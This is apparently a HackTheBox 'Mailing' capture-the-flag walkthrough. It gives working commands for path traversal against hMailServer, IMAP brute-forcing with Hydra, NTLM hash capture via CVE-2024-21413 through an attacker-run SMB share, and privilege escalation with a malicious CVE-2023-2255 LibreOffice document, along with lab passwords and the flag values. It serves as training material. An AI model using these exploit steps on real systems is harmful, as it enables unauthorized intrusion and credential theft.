Exploiting Mail Server Vulnerabilities | HackTheBox Mailing Writeup

The article explains a HackTheBox challenge involving a compromised email service. It guides readers through investigating the service’s vulnerabilities by examining how emails are processed, specifically focusing on file attachment handling. The goal is to exploit a flaw that allows malicious files to bypass security measures, gaining unauthorized access. Through reverse engineering and scripting, the author demonstrates how to identify and exploit the weaknesses in the email system.

HackTheBox “Mailing” machine involves exploiting vulnerabilities in a mail server. The challenge is centered around analyzing how emails, specifically attachments, are processed. A flaw in how the mail server handles certain email components is exploited to escalate privileges and access sensitive data.

Blue Team Cyber Security & SOC Analyst Study Notes

OSCP Study Notes

HackTheBox Mailing Machine Synopsis

Mailing is an easy Windows machine that runs `hMailServer` and hosts a website vulnerable to `Path Traversal`. This vulnerability can be exploited to access the `hMailServer` configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage [CVE-2024-21413](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21413) in the Windows Mail application on the remote host to capture the NTLM hash for user `maya`. We can then crack this hash to obtain the password and log in as user `maya` via WinRM. For privilege escalation, we exploit [CVE-2023-2255](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2255) in `LibreOffice`.

Information Gathering and Scanning with Nmap

With nmap, we get the below output:

# Nmap 7.94SVN scan initiated Tue May  7 00:00:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.180.156
Nmap scan report for 10.129.180.156
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          hMailServer pop3d
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
587/tcp   open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
|_imap-capabilities: IMAP4rev1 SORT completed IMAP4 OK NAMESPACE RIGHTS=texkA0001 ACL CHILDREN CAPABILITY IDLE QUOTA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
65522/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-05-07T04:04:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May  7 00:05:05 2024 -- 1 IP address (1 host up) scanned in 267.31 seconds

Open ports found:

110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd

25/tcp open smtp hMailServer smtpd
80/tcp open http Microsoft IIS httpd 10.0

References to mailing.htb appear in multiple protocol headers during the Nmap scan. As a next step, the domain should be added to the /etc/hosts file for proper resolution.

echo '10.129.180.156        mailing.htb' | sudo tee -a /etc/hosts

Path Traversal Vulnerability

A path traversal vulnerability occurs when an attacker manipulates input to access files and directories outside the intended directory structure. By using special characters like ../ (dot-dot-slash), attackers can navigate the filesystem to access sensitive files, such as configuration files, password files, or source code, which they aren’t authorized to view. This vulnerability is commonly found in web applications where file paths are improperly sanitized, allowing users to input and access restricted areas of the server.

It can be clearly seen in the machine if you attempt to retrieve the host file using BurpSuite:

The hMailServer

hMailServer is a free and open-source email server for Windows. It supports common email protocols like IMAP, SMTP, and POP3, allowing users to send, receive, and manage emails. The server can work with popular email clients like Outlook or Thunderbird and supports features like anti-spam, anti-virus scanning, and database integration for managing email data. It is often used for small-to-medium businesses and individual projects due to its ease of setup and flexibility.

In Windows, you can find the config file in the below location:

C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

For more specific instructions, visit the hMailServer documentation.

Additionally, The hMailServer logs, including those for AWStats, can be found in the hMailServer installation directory, usually at:

C:\Program Files (x86)\hMailServer\Logs\

C:\Program Files (x86)\hMailServer/Logs/hMailServer_{format}.log

Retreiving The hMailServer Database & AWStats Log Files

We saw previously that the there is directory traversal vulnerability therefore we will take advantage of that to download the mail server configuration file and the database.

Then the database can be downloaded with the below command:

curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Database/hMailServer.sdf' -o hMailServer.sdf

To retrieve the log files, execute below command:

curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Logs/hMailServer_awstats.log'

The AWstats log file contains the below:

Using Linux commands such as sort and cut, we can extract the mails and build a username wordlist:

curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Logs/hMailServer_awstats.log' | awk -v FS=' ' '{print $3,$4}' | tr ' ', '\n' | sort -u

Decrypting The Mail Database

We can use the hMail Database Password Decrypter to decrypts the database password from hMailServer.INI.

git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
cd hMailDatabasePasswordDecrypter
make

Opening & Reading The Mail Database

You can simplify the process by transferring the .sdf file to a Windows machine and using a tool there to open it. I’ll use Wine on my Kali box instead. Finding a compatible binary for Wine was challenging due to various .NET dependencies.

Use the below link to download the app and open it using Wine

https://www.flyhoward.com/SDF_Viewer.aspx?ref=benheater.com

wine ./SetupSDFviewer.msi

Once installed, import the database SDF file and provide the password:

hm_settings table has a SMTP relay hashed password (MD5)

We can use hMailServer Password Decrypter. hMailServer has a configuration file which may contain encrypted credentials for the database connection. The encryption used by hMailServer is a non-standard blowfish implementation. This program is a portable equivalent of this encryption method.

Execute below commands:

git clone https://github.com/mvdnes/hm_decrypt
cd hm_decrypt
xbuild
cd bin/Debug

After hMailServer Password Decrypter is ready and compiled, use the below command to decrypt the password:

LD_PRELOAD= wine hmailserver_password.exe 2ca9af353e4fa3ec92bf3778ea78db9c

Password is: Bm8zF3c5s7R9L1o2

Using Hydra to Brute Force the IMAP Server

So far we have harvested some passwords from the above steps, lets use them against the IMAP Server:

hydra -I -f -V -L emails.txt -p 'homenetworkingadministrator' -c 1 imap://mailing.htb

# worked with administrator@mailing.htb

hydra -I -f -V -L emails.txt -p 'Bm8zF3c5s7R9L1o2' -c 1 imap://mailing.htb

# worked with maya@mailing.htb

Creating the Mail Config File with Mutt

Mutt is a text-based email client for Unix-like systems. It’s known for its speed and flexibility, allowing users to manage multiple email accounts and formats efficiently. Mutt supports various features like threading, tagging, and an extensive range of configuration options, making it popular among advanced users who prefer a keyboard-driven interface.

Use nano to create the config file for the admin and maya users:

nano adminmutt

Add the below content:

set my_mailproto="imap"
set my_mailuser="administrator@mailing.htb"
set my_mailpass="homenetworkingadministrator"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5

Then execute the below command to log in as admin:

mutt -F ./admin-mutt

For maya:

nano maya-mutt

set my_mailproto="imap"
set my_mailuser="maya@mailing.htb"
set my_mailpass="Bm8zF3c5s7R9L1o2"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5

mutt -F ./maya-mutt

And this will log you in to the mail server:

Most of the interesting stuff is found in Maya inbox:

Use the arrow keys to navigate, press the Enter key to open an email. To change to another folder, press the c key and then the ? to select a folder. Press q to quit out of mutt. Press v to view attachments

CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

This specially designed email, when opened in the HTML view of the email client, results in a zero-click NTLM credential theft because the file:/// link is processed without security precautions. Clicking on the file:/// link establishes an SMB connection to the attacker’s system, using NTLM for authentication.

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC

This script presents a proof of concept (PoC) for CVE-2024-21413, a significant security vulnerability discovered in Microsoft Outlook with a CVSS of 9.8. Termed the #MonikerLink bug, this vulnerability has far-reaching implications, including the potential leakage of local NTLM information and the possibility of remote code execution. Moreover, it highlights an attack vector that could bypass Office Protected View, thereby extending its threat to other Office applications.

CVE-2024-21413 Exploitation

Start the SMB server or you can use Responder:

sudo impacket-smbserver -smb2support evil .

Then download and execute the exploit:

git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username 'maya@mailing.htb' --password 'Bm8zF3c5s7R9L1o2' --sender 'maya@mailing.htb' --recipient 'maya@mailing.htb' --url '\.10.14.112\test\test.txt' --subject 'Hello, Maya'

If we check the SMB server, you should see the NTLM Hash:

Then use John to crack the NTLM hash:

john --wordlist=rockyou.txt hash

With winrm, we can have the first foothold:

evil-winrm -i mailing.htb -u Maya -p 'm4y4ngs4ri'

Windows Privielge Escalation

Windows privilege escalation refers to the process by which a user gains elevated access to resources that are normally protected from regular users. This can occur through various methods, including:

1. Exploiting Vulnerabilities: Taking advantage of software flaws or misconfigurations.
2. Token Manipulation: Using methods to steal or manipulate user tokens to gain higher privileges.
3. Misconfigured Permissions: Accessing files or directories with overly permissive access controls.
4. Social Engineering: Trick users into executing malicious code that grants higher privileges.

For the machine we are targeting, we have the below observations:

• C:\Important Documents
• The scheduled task running soffice.ps1 out of C:\Users\localadmin
• C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu

Clearly, we don’t have access to the files in C:\Users\localadmin, so we can’t be certain about the actions of the soffice.ps1 script. However, let’s look for any additional information that could provide insight.

(Get-ChildItem 'C:\' -File -Recurse -Filter '*soffice*' -ErrorAction SilentlyContinue).FullName

Examining the source code for C:\Program Files\LibreOffice\program\soffice.ps1, we can see it attempts to open any *.odt files in a specified directory, which is C:\Users\Public\Documents.

I suspect that the C:\Users\localadmin\Documents\soffice.ps1 script is a modified version of this one and likely reads from a different directory, possibly C:\Important Documents.

This information, along with earlier findings referencing file:///C:/Users/maya/Documents/exploit.odt, supports my hypothesis that I can pivot using a malicious document.

This was also one of the lateral pivots in the HTB Office box, so I’ll apply my existing knowledge of the exploit from that experience. For more details, I’ve linked the proof of concept and CVE information below. In summary, the exploit succeeds because, in certain versions, LibreOffice loads links in specially crafted documents without any user interaction (zero-click).

CVE-2023-2255 Libre Office Exploitation

git clone https://github.com/elweth-sec/CVE-2023-2255

cd CVE-2023-2255

# Create the malicious .odt document
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output evil.odt

Back to Winrm, make sure you logout and then log back in and you will find that maya is now a member of the administrators group

HackTheBox Mailing User & Root Flags

User flag:

9784c83d0dbf02a9f237197737876625

Root Flag

3d664924b00f0be0e92f04db10ff3e76

CTF Walkthrough Playlist